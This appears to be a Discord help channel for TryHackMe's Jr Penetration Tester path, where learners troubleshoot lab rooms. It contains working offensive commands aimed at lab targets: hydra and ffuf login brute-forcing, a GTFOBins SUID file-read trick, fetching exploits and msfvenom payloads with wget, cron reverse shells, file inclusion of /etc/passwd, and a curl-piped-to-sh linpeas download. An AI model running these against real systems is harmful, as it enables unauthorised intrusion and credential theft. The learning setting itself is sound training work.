Gave +1 Rep to @shadow echo

hi, in “Walking an application” room, in documentation i found ||/thm-framework-login|| path, login with default creds and got flag, is this a bonus one? this flag did required anywhere else in room.

nm, this is the answer for the next rooms task

hi,in cross site scripting room,task8 (practical example) I am not getting any responses in my netcat listener,but the same is working fine with thm request catcher.Can anyone please tell what is wrong

Hi Guys, why isn't the search -f *.txt on the meterpreter session not coming back with anything or does it take a while please?

Ignore that just take's a while to search sorry lol

Struggling to create a 500 internal error on the Burp Suite: Repeater room

Any ideas guys?

Did you read the hint ?

yeah

And did you try all of these hints already ?

yes

Then I guess you should have already received an 500 error. So what numbers for example have you tried ?

6, 7, 8, 9, 10. 1000 and so on

I just get 404s

What about the part of the hint saying "or a number less than or equal to 0." ?

That worked.

I must have misread the last sentence

Completed this path tonight!

Windows stuff is hard!

I'm stuck on task 5 of Linux PrivEsc. the exploit code won't compile

https://www.exploit-db.com/exploits/37292 this is the exploit

Are you sure it didn't compile?

Warnings and errors are different, warnings don't prevent it from compiling

oh

not a programmer

so it all looks like it's says "This isn't going to work" to me

You'll see warnings and errors quite a lot in sec, it's important to remember the difference IMO

thanks @idle bison

Gave +1 Rep to @idle bison

now I'm getting permission denied when I try to transfer my exploit to the victim machine

@idle bison

HTTP request sent, awaiting response... 200 OK
Length: 17112 (17K) [application/octet-stream]
exploit: Permission denied

Cannot write to ‘exploit’ (Permission denied).

Task 5?

yeah

What directory are you in when you wget?

"/"

thanks @delicate tide

Gave +1 Rep to @delicate tide

I can't progress anymore in the Linux PrivEsc anymore

stuck on task 7

user doesn't have access to sudo at all

Not sure how I'm supposed to even do that task

If you would be able to use sudo, there would be basically no point in trying to escalate your privileges

but the exploits require sudo

What exploit you talking about ?

the GTFObins

But as I said, if you would be able to use sudo, you could anyways do everything on the system

So if you have to use sudo, you are doing something wrong

https://gtfobins.github.io/gtfobins/base64/

As you are not allowed to use sudo, the sudo part of that gtfobins part doesn't apply to your scenario. I highly assume you found that binary by searching for SUID bit, so you have to use that part of the gtfobins

Yes because the SUID bit is what this task focuses on

Right, so I'm not sure why you would have to use sudo ?

Are you talking about that part? sudo install -m =xs $(which base64) .

yes

The descriptions says: "To interact with an existing SUID binary skip the first command and run the program using its original path."

So you can just skip that first command.

I feel really stupid and I have no idea what to do now

So as you can skip the first command. There are only 2 commands left.
LFILE=file_to_read
./base64 "$LFILE" | base64 --decode

So the first one of these 2 is just assigning a file path to a variable. E.g LFILE=/home/karen/flag.txt
The second command is executing the base64 binary, encodes the file contents you have specified in the LFILE variable, pipes it again to base64 an decodes it, so that the contents get printed out for you.

So basically you can read files, you shouldn't have read access to

thanks @shadow echo I was able to get the flag. Now I just need to unshadow the password

Gave +1 Rep to @shadow echo

I think I got the password unshadowed but I don't know which part is the password hash

wait. no I didn't

why didn't unshadow work?

ok unshadow seems to have worked but I can't crack the password even though john cracks the two other hashes in the file

grrrr nevermind I got it

Ok I'm on task 8 of Linux PrivEsc and I'm not sure what I'm doing wrong. I've edited the script to open a reverse shell on port 6666 and I set netcat to listen on that port and nothing.

Task 8 or 9 ?

I mean 9

Check the permissions of that script file

@shadow echo thanks

Gave +1 Rep to @shadow echo

I'm clueless as to what to do for 10.

got it

Folks, in metasploit exploitation room, one of the questions asked what is running on port 8000
I used nmap to answer this question. I see the hint is given as use http_version module.

I understand we are asked to use the httpversion module given a web server is running on the target port.
But what if some other apps using that port? Any generic metasploit module available to identify what is running on a port?

Why wouldn't it be able to do HTTPS?

There's an option to negotiate SSL so it does support it

anyone know how to change the default termianl view from this

well not letting me upload a file.

trying to have the terminal all 1 line and not 2

┌──(kali㉿kali)-[~]
└─$

trying to have it all one one line

what kali version are you using? @barren lintel

2021.4

I am assuming that 2 lines have come by default after 2020 version.
try changing your shell if that works.
I will try to research and let you know if I found anything

yeah tried that. In my OSCP learning PDF they say to run C + END

but that doesn't work nor do i know how that would ever work as that would just type out a boat load of CCCCCCCCCCCCC

have a look at this https://superuser.com/questions/1603642/how-to-revert-to-one-line-terminal-in-new-kali-linux-2020-04

@barren lintel

@dark cedar @barren lintel Better than editing the file, try kali-tweaks

sure, will check
thanks @idle bison

Gave +1 Rep to @idle bison

Anyone Can tell me how can I pass Cloudflare verification for XSS Vulnerability?

I'm unsure what exactly you mean ?

capstone room is slow

Thanks for the links. Just edited line 115 to have "oneline" and it's now back

Gave +1 Rep to @idle bison

PROMPT_ALTERNATIVE=oneline
NEWLINE_BEFORE_PROMPT=yes

I am doing this for bug bounty. Can you help me with that?

i tried this too and had the same problem. I've seen other walkthroughs add a referer path but we haven't learnt this method. I'll hv to do a curl request too but I would like to know how this can actually be done on burp

Hello, trying File Inclusion room on task 8, question number 2 (/etc/flag2), it says the message "Refresh the page please!", it does not appear to work on firefox (don't know if is my browser), tried on Chrome and message changed and received the flag, just in case anyone having the same problem

how do I transfer files to a remote desktop instance?

let me rephrase: how do I share files with a remote desktop session?

using rdp, click show options, go to the local resources tab and click more. From there expand the drives and pick the drive you want to share files from

@civic kestrel I don't see any options

there should be a show options button on the bottom left when you open remote desktop connection

the one that comes with kali doesn't have options

my bad I thought you were using windows

Hey everyone, in the File Inclusion Room Task 4 Question 1. I am constructing the URL to reach the /etc/passwd file. So far (I think) this is correct /****.php?file=?etc/passwd but I can't figure out the first four digits after the start

/* ** *.php?file=etc/passwd

Wait nevermind I figured it out

@civic kestrel thanks anyways

Gave +1 Rep to @civic kestrel

@pearl sage Isn't it great when that happens?

lmao yes

freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]

@civic kestrel

are you sure you have the right IP address and the port is not blocked?

I figured it out. I wasn't connected to the tryhackme vpn

still can't share files

got it working

I did it! I completed the Jr. Penetration Tester path!

hey

i'm playing aorund with sublist3r for domain enumeration. Anyone know what brute force switch does with that tool. The help pages don't provide any data nor does the github

Does anyone has any tips on the File inclusion challange for flag3, i've found 2 CVE-s linked to it but somehow cant find a way to exploit it?

you've tried amass?

For flag 3, to get it you have to apply a combination out of request method and filter bypass.

Hmm... i tough about somehow manipulating the session by passing some values in the PHPSESSID or setting a cookie and then invoking it with the parameter, but it didn't work... Those are the two CVE-s I've stumbled across CVE-2011-2505, CVE-2010-3065 can they get in any use.

Well actually it's pretty straight forward. Check out the task about filter bypass/getting rid of file extension again and just try a "normal" file inclusion with the correct request method and you should be fine. So no need to look for any CVE whatsoever

Thank you sir!

Gave +1 Rep to @shadow echo

I've solved it, but noticed something. My request was absolutely the same in burp and in terminal where I curl-ed. I am usually doing everything with burp, but as I've tried with curl it worked. I think it's a bug.

No, I guess it's most likely due to curl adding a specific header when defining the request method, whereas burp only captures the request you make in your browser and you either didn't manually add that header on your own or specified the correct request method in your browser in the first place.

sup can anyone help me with file inclusion task 4 2nd question

pls

You should ask the question you have with that task straight away

where am I suppossed to find the answer

In lab 2 of the target machines webpage

I dont know where to find it actually

the answer

lol my attackbox just crashed

You'll find the answer in the error message in lab 2

bruh

damn im dumb as hell

me, stupid trying to get answer from this

So you found it now, right ?

Hey, just wondering i'm on the Auth Bypass page, on Task 3 brute force i'm putting in the command i need to but not getting any results, any ideas?

Check your valid_usernames file. It's only supposed to have the usernames in it and not any extra strings like status codes, size etc.

yeahh i thought that so i checked it and edited it

And still not working ?

or do they have to be on the same line with commas?

i just put them on seperate lines because that's what the passwords ones are like

No they don't. So I assume it's still not working. Then create a new file with touch filename and write the usernames manually in it. So to not have the output file from ffuf anymore.

i'll give it a try

is it

touch Admin Simon Robert Steve valid_usernames.txt

lmao nevermind i realised

What? No ^^

that makes the files

Ye

so i just made 5 files lmfao

sorry nooby

so touch valid_usernames.txt

then open and put the names in myself

Yes, did you delete the previous valid_usernames.txt file ?

yeah

Ok

ok thx!

dunno why it wasn't working the first time, the file was the same..

I think because ffuf for some reason is not outputting the file in the correct format. Need to check on that myself to fully understand.

thanks for the info!

i have not but did see TCM talking about it so i'll give it a shot

yep, thx

Gave +1 Rep to @shadow echo

Thank you for answering these questions 🙂 i was having the exact same problem.

Got mine to work as well using your directions ❤️

What's the best number of tasks to use to speed up hydra brute forcing?

would guess increasing threads could increase hydra speed

but there are limits there too

ah yeah the default is 16 tasks/threads increasing that to say 32 would increase the speed but might also get you detected quicker and therefor make you appear quicker on the denylist making you not able to continue your attack... you could also mess with -w time flag/parameter/option to increase speed by not waiting as long for a response all the time

the best numbers will vary between targets

Too many threads can also cause context trashing on your VM or host. Don't run more threads than you have cores you are willing to dedicate to it.

Most of the time spent in hydra is waiting for network stuff to happen, as far as I can tell. Increasing threads doesn't necessarily help with that if the blocker isn't # of simultaneous connections.

I'm just trying to optimize for the particular task, I am doing. I'm on the netsec challenge in the junior path

guys I'm trying to do the linux privesc kernel exploit part

Lmao nevermind! I was using the wrong port in the URL to fetch the exploit binary 😛

GG

hey guys, i'm doing an assignment for uni, and i have to crack the password of a pdf using some documents as the wordlist, but when i use jhon the ripper to get the hash of the file it returns the path of the file instead of the hash, is it possible to get some help here?

"./pdf2john.pl /media/sf_DFF_Case_Files/sellerZ.pdf > /home/kali/Desktop/password.txt" , this is the command i'm using, and this is what i get as a reply : /media/sf_DFF_Case_Files/sellerZ.pdf:

do you guys know any good way of doing this?

To not leave you without an answer.
You probably didn't received a reply because it has nothing to do with a thm room/path and also because of that: #room-help message

hey people
I am trying to use hydra:

hydra -v -l admin -P ~/Downloads/rockyou.txt **** http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login&return=bW5kZXgucGhw&13143b50d76bf4f81c8e03165a6db4ac=1:Login Failed"

But the output is always like this

[80][http-post-form] host: ****
   login: admin   password: 12345678
[80][http-post-form] host: ****   login: admin   password: babygirl
[80][http-post-form] host: ****  login: admin   password: lovely
[STATUS] attack finished for ****(waiting for children to complete tests)
[80][http-post-form] host: ****   login: admin   password: nicole
....
....
1 of 1 target successfully completed, 16 valid passwords found

am I doing something wrong ?
This is Daily Bugle task.

Did you check what the actual login request on that page is looking like? So by capturing that request with burp for example ?

yup

and there is also Cookie: header, but should I include that in the hydra, I guess it is optional , and it is not in the data section

Could you show a screenshot of that captured request in burp pls ?

sure

Well, I guess you could try to include that cookie, yes

Or delete that cookie in burp to see what response you get

Also, maybe try turning down the threads in hydra, to like 4 and check again if it's working

ohh, nice, when I deleted the cookie got the 400 error

noh.. same

[80][http-post-form] host: ****  login: admin
[STATUS] attack finished for **** (waiting for children to complete tests)
[80][http-post-form] host: ****  login: admin   password: 123456
[80][http-post-form] host: ****  login: admin   password: 12345
[80][http-post-form] host: ****  login: admin   password: 123456789
1 of 1 target successfully completed, 4 valid passwords found

request:

hydra -v -t 4 -l admin -P ~/Downloads/rockyou.txt **** http-post-form "/administrator/index.php:username=^USER^&passwd=^PASS^&option=com_login&task=login&return=aW5kZXgucGhw&07f73be725d051c2b68db5ee7ee77f45=1:Login Failed:H=Cookie:2b01af51830ca9615359108de04d9ca1=2tpnmp3m6bqng0cce3kfoup9i4" 

Mh, I would have to try it on my own as I'm not sure why it is like that. Or you maybe try checking a write up for that part of that room

@craggy shoal what room is this?

Daily Bugle

and sql injection room done

Hi everyone. 🙂 Do you know if Dirbuster is still a current tool? SourceForge mentions it was last updated in 2013 but it is still installed in Kali apparently. 🤔

I've used dirbuster before

But I prefer dirsearch or gobuster

Granted, but the question was really: is this thing still… a thing?

By the looks of it not really

Their gitlab stuff has barely been updated

Alot of the lists are 9 years old with no updates

did anyone else have issues with nmap not working correctly for advanced port scans? I keep having issues showing unfiltered and open|filtered ports

specifically in their own kali machine using openVPN

I can get it to work on attack box

yes not really sure what the problem, but look like its very slow when i did with vm kali + openvpn. maybe the internet not fast enough?

me too

no my issue is that it just would how zero results for -sF scans

but in the attack box I would get the proper ports returned

sorry, but on what circumtances you need the -sF scan?

Advanced port scans tasks in the nmap section of junior pentester

did you try append --reason ? to see why its returned 0 result?

worse case just change your openvpn ip might help you

I might have used --reason incorrectly because it doesn't show anything differently than without --reason. Maybe these screenshots will help. I just want to make sure I'm not doing something wrong or that I have something configured incorrectly. the VPN is connected, I can ping that same machine. I'm guessing the ignored states message is a clue but I don't really get great info if I google the problem

Can I try to scan your target machine too? As you should get the same results on your own machine then on the attackbox

try to scan your machine    sudo nmap -sF 10.10.183.100  1 ✘
[sudo] password for landax:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-31 22:21 WIB
Nmap scan report for 10.10.183.100
Host is up (0.40s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
53/tcp open|filtered domain
80/tcp open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap

Nmap done: 1 IP address (1 host up) scanned in 39.22 seconds

yes go for it, it's up

You scanned the machine without asking him first ^^?

my bad, just try to help him. but sorry i cant

Okay, got the same results as landax and it works just fine. So are you on your local machine right now ?

yes I have a VMware with my own kali, VPN connected and working. I can ping the target machine

If you check ip a s do you only see a tun0 interface or any extra like tun1, tun2 etc. ?

I have never used this before so I hope I give you the correct info back. I see three results. one looks like local host, 2 looks like my ethernet, 3 is probably my kasm docker because it says "docker0"? Not seeing anything that says tun0. another aspect of this problem that I should mention is that some nmap scans do work the target machines. I didn't have any issues when I did the basic scans like -sT

I sense the magic one liner : sudo ip link set dev tun0 mtu 1200 incoming 👀 I've seen this setup before 😄

So that means you are running openvpn on your host machine instead of directly inside your VM ?

yes, that's correct

Then that's the issue, you have to run it directly inside your VM. So not on your host machine and also not on your host machine and the VM simultaneously 🙂

Well, seems like not this time 😄

that makes sense! I will work on getting this set up correctly. Thank you SO MUCH! I really appreciate your help 🤜

Gave +1 Rep to @shadow echo

uh you're the man

Ayee just finished the Jr pentester path :))

cross posting this from hints channel to see if anyone knows:

I'm stuck on something in https://tryhackme.com/room/linprivesc probably simple
in the walkthroughs when it gets to exploit-db everyone seems to be pulling a .c file straight from exploitdb but when I check it's just a .TXT of instructions
either they're not showing a conversion of some kind that happened before writing or making the video or I just don't know how to do it

What task?

Can you verify and share a screenshot please?

!docs verify

Sorry, I meant to reply I got an answer. It was Task 5, I didn't realize formats on Exploit DB were split into multiple pages, so there was a different search result for the same exploit that had a .c download

🔥 Good work!

and I'm verified now, thanks

You're welcome!

Hello, I am trying to complete the subdomain enumeration module and I am on the virtual hosts section. It gives you the script to run, but when I run it, i'm not finding the two domains it wants me to. It just scrubs them all and ends. Am I just a moron?

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host:FUZZ.acmeitsupport.thm" -u http://10.10.146.173 -fs 472

It did the same thing, burned through the wordlist and didn't return any subdomains.

standby

No I do not. However, that wasn't in the lesson to add it so I didn't

No, which makes me wonder if my attackbox is acting silly.

When ever a room is mentioning a hostname as the target rather than as an IP, it's a safe assumption you have to add that hostname to /etc/hosts . Most of the time it'll tell you to add it to hosts, but if you're anything like me you'll usually miss that piece of information. 😂

I can reach google and everything else I have needed to open though.

Ok, I can do that 😂

Will do

I'm evidently still doing something wrong. I added the acmeitsupport to /etc/hosts, but still not getting anything.

Ok, verified. It might just be I didn't add the acmeitsupport.thm correctly in the hosts file. I've just really started messing with this.

Can you ping the domain or access it in your browser now?

Like I said, I know this is me doing something like an idiot. I tried ping acmeitsupport.thm, but it didn't do anything. Is it different than pinging an ip address?

the entry should look like this <IP> acmeitsupport.thm make sure it starts on a new line.

I figured I was entering it wrong. I guess getting the IP for acmeitsupport.thm is the issue I am running into right now. I feel like this is becoming way more complicated than a simple subdoman enumeration exercise.

I tried that, but that's the IP for my attackbox isn't it?

I'm looking for an IP for the target, but I didn't see one.

I clicked it but it said I could only have 3 machines open at a time. It's not giving me that bar with the information like it did on the last module. I might just try signing out and back in to clear things out.

Where is it hiding the other two boxes? In the previous lessons?

I found them, didn't realize it wasn't just carrying the machine over from one to the next. I bet THAT is the reason it cannot find it in this module. Good to know for the future.

Like I said, I knew it was me doing something dumb.

Always learning at least.

Thank you, you guys are awesome.

Finished it by the way once I had the target machine for the module actually running. Bet I don't make that mistake again. 😂

Hi everyone. 🙂 I'm getting familiar with Dirb and experimented sending Dirb's traffic through Burp Proxy using the -p flag. This works fine but in Burp Proxy's Intercept tab, it seems I need to click the Forward button individually for all requests sent by Dirb. Is there a way to 'Auto Forward'? Doing it by hand is just unpractical.

Disable intercept ?

Works great. Thanks! 👍

Hiii! For Authentication Bypass / Cookie Tampering, is there a specific way the lesson would like us to do the base64 hash decoding / encoding? Reading back through I can't really tell if there's a recommended method.

I just used base64decode.org...

Well, actually base64decode.org is even in the hint, so that's perfectly fine. But you can decode / encode it with whatever works for you. Cyberchef for example is a great tool in general, in case you never used it before. https://gchq.github.io/CyberChef/

Hah, no way! I should've looked at the hint for sure. Good, I'm glad that I was mostly on the right track… I thought they maybe should have been away for me to do that with the /test-cookie page but I gave up after a few tries.

Good call on CyberChef, that was recommended/used in one of the tasks in one of the fundamentals rooms I think. I need to dig into it further, thanks!

Gave +1 Rep to @shadow echo

Very very very important. Base64 is not a hash.

That's a great point and clarification. We just refer to the base64 encoded strong as..."a base64 encoded string" then?

Base64 encoded data, yeah.

hows everyone doing

What command would you use to clear a set payload in metasploit ? i forgor💀

good what abt you

good spending the night doing THM rooms in between playing some CS lol

In CS are you silver or gold

not sure if in the right room, but any idea if i could run a slow gobuster scan for discovering locations and evade WAF?

members i run this command it gave me this error

I'm unsure what part of that screenshot you mean as an error ?

Hey guys, I hope that you all are well

I'm new in the cyber security stuff and I need more resources to learn this stuff

I am currently learning from try hack me and hack the box but they are not completely free

Can someone guide me more please ?

About 80% of the THM rooms are free. So I think you should have a lot to learn before running out of rooms 🙂

If the next room in your Learning path is subscriber only, it doesn't mean the rest of them are as well. Skip the subscriber ones and do the free ones. You can learn a lot with a free account. Keep grinding!

Okiee thankss

morning everyone

what is this for

?

this is a channel for one of the learning paths from the website https://tryhackme.com

@crisp wadi ⬆️

hi all, im stuck on the windows privesc room, task 2 is to rdp on to the machine and check what users are there etc, except there are no login creds and researching the default for the setup used as hinted in task1 gives no joy. Am i looking at this wrong?

Show split view 🙂

wow thank you! after all the hair I have just pulled out

Gave +1 Rep to @maiden stratus

It is still showing this

Even though I started the machine in the room "Authentication Bypass"

Is this your VM browser?

No Its my host machine

Im using the In-built Kali Machine

ah youre using attack box right?

yeah

Solved it meanwhile ?

In windows privesc room, isn't there any other way to switch to user "jack"?

rather than logout and login, just simple switch like su in linux

I actually started the website using this room

https://tryhackme.com/room/walkinganapplication

and then started solving the contents of this "Authentication Bypass room"

Got this one

The solution was to use this

Instead of this

Sorry for pinging about this

Well, to me this all looks like you are not on the web based attackbox or kali machine. So it seems you are trying to access this target machine via your own machine. And the reason you can access the site with thmlabs.com is that you don't need to be connected via the thm vpn to access it. But the IP based url you will have to be connected to the thm vpn

umm yeah something like this... sorry I dont know much about this

😓

If you want to go through room from your own machine, connect to the thm vpn and you are fine. This rooms shows you how to connect: https://tryhackme.com/room/openvpn

gtg now, in case you still have issues reach out again in this channel

ohh ok thank you

i have a question on the command injection practical. i can't get any response from the machine, and i'm guessing because i'm inputting the commands incorrectly. is there a particularl syntax i'm supposed to use? the reading material is not very clear

That was nice ot receive 🙂

Congrats!

On to the next path!

Congrats! @lone berry

Cheers it was a good path that, really enjoyed it

Hello 😀 I am on the msfvenom section. I have used wget to transfer my payload to the ssh session machine. And now Im trying to get a session on my attacking machine but it keeps telling me no session created. Am I supposed to activate the payload on the ssh machine first?

Attacking Machine

SSH machine

Appreciate any help, I been stuck on this all day.

@steel nymph hello

I have restarted the attackbox and tried this over and over again.

OK. I just dont see how it is in use LOL. OK thanks so much for your time.

@steel nymph So it looks like 7777 is in use and 4747 is not in use?

OK thanks again! I will try do it again with 4747 and let you know how I go:)

Trying to figure why this crontab script isn't working on the Linux PrivEsc task

I've configured the script and the listener to the same port

Is it executable?

I'm an idiot

Hi anybody that can help me out with this. when i do the content discovery room i can't acces the sitemap.xml page but i can read the robots.txt just fine any ideas?

What's the error you get?

No specific error just hangs, both in firefox, as curl

Hmm

I tried it and it works. What address you typing in?

http://10.10.99.48/sitemap.xml

or the same with robots.txt

Might be issues with the box itself. Try terminating and rebooting the box

Alright already done that in the mean time i'm gonna reboot my vm to

Ok

Seems weird that the robots.txt works, but not sitemap.xml

Yeah same problem : command: curl http://10.10.70.124/sitemap.xml

weird stuff

Error: error on running gobuster: unable to connect to http://10.10.70.124/: Get "http://10.10.70.124/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
A more complete error when running gocbuster

Kongrats!!! It’s a lot of work!!!

@steel nymph thanks a lot! Got there in the end and completed the room👍

Gave +1 Rep to @steel nymph

Guys, has anyone had issues with the linux privesc CRON task? I swear I got the script being run under cron OK, the correct IP and port to establish the connection and the listener on the attacker host listening on the right port yet I'm not getting the reverse shell.

It's supposed to run every minute but still...haven't got anything yet.

Check the permissions of the script you edited.

Thanks! (Deleted the ayy lmao meme. Too big. Better leave the youtube song: https://www.youtube.com/watch?v=4vkR1G_DUVc)

Gave +1 Rep to @shadow echo

I am doing capstone

how do i fix this

this is the exploit code

It seems to be an error with the host url
You have url=http:/10.10.31.108/:8881
With only 1 / after the http
Try using 2 //
http://host-ip:port

Hey guys I am working through the Authentication Bypass segment in the JR Pentesting learning path. Im stuck on the bruteforcing with ffuf bit when i run the command with the valid_usernames.txt im not getting any output. Should it be outputting to the terminal window or a file?

I just seem to get no output at all

is the valid_usernames.txt a couple usernames seperated by new lines????

@sage current

hmmm

maybe the wrong flags for the content lenght or something

Is this a manually created file, or you just edited (removed all the status codes, size, etc.) the output file that ffuf created ?

Hey guys, I've started the "Walking An Application" room, and for some reason, I can't reach the "acmeitsupportv10" website maybe someone knows the possible reason? (via openvpn)

@inner python Did you try using the IP address rather than the url?

@inner python You can also use the https://x-x-x-x.p.thmlabs.com that is shown in task 1 from a device not connected to vpn.

I'll soon have this path done

@warm crypt Well done. I finished the "Complete Beginner" path 30 January and am up to 26% here. If it weren't for classes for a degree I'm paying much more for I figure I could finish this in a month or two.

I finished that last year

A good way to start

ohh tnx sorry i didn't notice this

@inner python I'm sorry if you had already tried that. I fired up the machine again and was able to get to both the url I referenced from a non-vpn'd instance and to the website by using the IP address directly on VPN.

Sometimes it's an issue with the VM as while

If I run into an issue I'll usually boot up a new instance of the VM or restart my kali VM

@warm crypt Very true. I'm prone to banging my head against a problem for way to long before I take that step.

Worth checking the status of the openvpn session in your terminal

If it's changed from Initialization Sequence Completed try running the openvpn script again

@inner python

its working with the link from the firs task tnx 🙂

Cool

i'm trying to execute this .elf that i msvenom'd to get a rev tcp. what am i doing wrong?

Set your payload in multi handler correctly and it should work

is that what 'segmentation fault core dumped' means?

Not directly.

Hello, i'm trying to finish up the privilege escalation sudo block, it tells you to get the hash of franks pwd, I got it, but it's saying the answer is wrong. It matches the format displayed so I am not sure if I am just stupid.

standby

It says frank in the question

Every time I dump the hash in a decoder it tells me it is an invalid hash. I'm assuming I am doing something just slightly wrong.

||$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDE
wW1c3CahzB1uaqeLR1||

Is it saying "Wrong answer" or "undefined" ?

wrong answer

lol ok

Haha, ok it took it that time

Next time I am sure I am right, hit refresh and try again.

At least I had the right answer I. Great success in learning.

Please put answers into spoiler tags

Sorry juun, I will make sure I don't screw that up in the future.

No worries, just don't want someone who wants help getting an answer they didn't want

From what I am seeing doing extra research, the hashes you can get, are those pretty hard to actually reverse? I know that it seems like this is asking a lot of questions on what specific users pwds are, but the research I have seen basically says outside of using John, it isn't something you can just dump into a decoder and get the plain text from.

I'm obviously new at this, so looking for any good extra stuff to read to improve the knowledge base.

You can, theoretically, dump any hash into a brute force tool and get a plaintext answer

and tools like jtr and hashcat aren't decoders; there is nothing to reverse

do you know what a hash is, and how it differs from an encryption or encoding?

Vaguely, a hash is basically a 1 way randomization of the plain text. Encoding is basically using a set algorithm to change plain text in a way that can be easily decrypted by the proper user.

I have tried dumping the hashes into a few online tools, but none of them have actually spit out a plain text. That's why I figured that what I am getting for these user hashed passwords are something I am missing the point on for turning them into a plain text answer.

Ok, that makes sense.

it's not really a randomization. a hash applies the same transformation every time, regardless of input. That's how you can store a hash to verify a correct password

I'm doing lots of side learning during this part. Up till now, it seemed like the path kind of walked you through the tools and things you needed to get through things. This has been the only part that seemed to kind of deviate and I am a little lost on using what needs to be done. Yah, I saw in the file where it told me what kind it was. Just wasn't completely sure what to do with that afterwords.

john is also very slow to brute that type of hash, if you have a host with a decent GPU, you can run hashcat in windows to speed it up

it'll still take a much more significant amount of time than any of the toy examples, such as NTLM or SHA1

Ok, i'll keep plugging away at it!

Juun, thanks for the explanation on that stuff btw. It cleared some things up for me that I was trying to draw the lines to in my head. I ran a hash through john and doing a single one like that it completed in about 10 seconds and spit out the answer.

Gave +1 Rep to @slate sinew

anyone know why this ffuf command is not returning any results for me from the authentication bypass room?

https://tryhackme.com/room/authenticationbypass

Already confirmed the uname/pass im looking for is in the verbose output from ffuf if i remove the filters but its returning a 200 http status code. where as if i narrow it down to this it returns a 302 status code...

check your directories for both valid_usernames.txt and your wordlist location.
Make sure you're launching the command from the same directory where valid_usernames is.
make sure you only inputed the usernames in the file properly, so extra spaces or anything, each username needs to be on it's own line.
to check your path for the wordlist just do locate 10-million-password-list-top-100.txt for easy confirmation

Even your adjusted syntax should work perfectly fine. I can't see any errors in it.

@lapis lake That's the thing that's driving me nuts here. Thats the output im getting...its checking both wordlists against each other. The output in the pic is the answer but for some reason its returning a 200 status... but if i just run it with one word list against like this-

ffuf -w /usr/share/seclists/Passwords/xato-net-10-million-passwords-100.txt -X POST -d "username={correctUserNameHere}&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://{targetIP}/customers/login -fc 200... it will return a 302 status. letting me know its fuzzed the correct pass

ffuf result when i just put in each username one at a time against a password list

well 302 is a redirect, so after posting both correct credentials it's only natural you'd get 302, since your method is POST.

I'm not an expert in this, but in my mind, 200 code is used to check which brute force attempt is correct, so it goes through names till 200 is found then goes through password for 200, when both are A-OK, it logs you in, which results in a 302

I'm sure someone can explain it better than my ooga booga brain. 😂

I guess the problem is that I can't seem to get it to POST both correct credentials when i try to run it with 2 wordlists. not a big deal in a THMroom when you only have 5 usernames to cycle through but would be incredibly tedious in a real life scenario when you might have to run 1000's of users against a much larger password list

Anything with a 200 status return is useless to me here because everything you send it returns 200 even if its the wrong credentials. The -fc 200 is to filter those results out because the redirect is what I'm looking for to tell me I found the right credentials. No worries though if anyone has a clarification for me that'd be dope but probably just going to work with another fuzzing script and move on

Did you create the valid usernames file on your own, or is it the file you received as output from the previous task ?

output from the previous task

Create a new file with touch new_valid_usernames and then manually write the usernames in it by hand

@shadow echo got it to do what i wanted finally. Thanks, i pretty much restarted the room and the machine. Messed around with wfuzz for a while too but i don't like it as much doesn't accept as many args and the output is messy

Gave +1 Rep to @shadow echo

So you didn't get it to work with the manually created usernames file in ffuf ?

@shadow echo not at first but i think the machine i spun up for the room was acting up. I termed it. deleted all the other txt files i made and basically restarted from that step. I wrote the unames in mousepad manually and ran ffuf again because idk... when i used nano or touch to make the txt file it wasn't running anything but the last uname in the list

Alrighty

but yeah it was helpful thanks.

Hi everyone, sorry to ask but can't find how this work 😦

Basically i've done the jr pentester path few weeks ago but lately i've seen that i could've got tickets from this path that could lead to prizes. So i went to check how many i've got but looks like i didn't get any. I surely missed something could someone explain me what ?

thx 🙂

Tickets were a limited time thing.

We're celebrating the release of our new Jr Penetration Tester learning path - complete a room that's part of this path and win tickets, get 3 of the same to redeem a prize. If you're a free user you can win 1 ticket, however subscribed users can win 2 tickets.

The ticket promotion ends on the 31st of October 2021

https://tryhackme.com/room/tickets2

Any idea why OS detection might fail in nmap04? I guessed the right answer but running nmap ip -O I get no exact matches for the host

i cant run linpeas

welppp

did you mark the script as executable

i downloaded the repo using git clone

i dont see linpeas.sh

oooh

the download for the linpeas.sh is here: https://github.com/carlospolop/PEASS-ng/releases @sullen perch

the entire repo is for building the script yourself

if you want a link you can curl to download the script it would be this currently but might change later at newer releases:
https://github.com/carlospolop/PEASS-ng/releases/download/20220207/linpeas.sh

@sullen perch ⬆️ hope this helps

Alright, thx for letting me know and soz for this dumb question🙂

Gave +1 Rep to @warm crypt

It's not a dumb question, lol. Even I didn't know this until a checked the linked room

Well I read them yesterday but I may have misunderstood what it said, wish there was a french THM :p

i dont get linpeas

still cant figure out how to run

or install linpeas

i git cloned it

whats next?

you don't git clone linpeas but get it from the github releases page

or if you are looking at the readme here: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
to download linpeas locally you do: ```

From github

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

@sullen perch ⬆️

so i mounted but i cant see thses files in target machine

this is from linux pricv esc NFS

Iirc you're supposed to mount /backups

can you show the output of showmount -e <machine_ip>

I need help with the username enumeration with ffuf its just giving me numbers not name? I don't know what I did wrong...

I got it that you

Thanks Luma I know it was while ago you gave this advice but it help me today lol

Gave +1 Rep to @opal furnace

Hi All, running through Metasploit: Exploitation, on Task 6 the instructions are a little too vague for me to understand where and how to perform each action. I used the attacking machine to ssh into the box, I used another terminal to launch the .elf payload. but this part "use wget http://ATTACKING_10.10.129.24:9000/shell.elf to download it to the target machine" i dont understand where to perform this command (in the ssh? on the attacking terminal?) or how to edit the command so that it works (both IP's?).

Remove ATTACKING_ from that

thanks @idle bison that worked for downloading attacker to box, but when i run ./rev_shell to launch the reverse shell it says permission denied, but I am root on the box

Gave +1 Rep to @idle bison

chmod

H4CKERM4N does it again thanks @idle bison

while doing dll hijacking, my kali has turned to windwos theme

idk how to go back to default kali

what???how this happened?

look at these , i dont like it

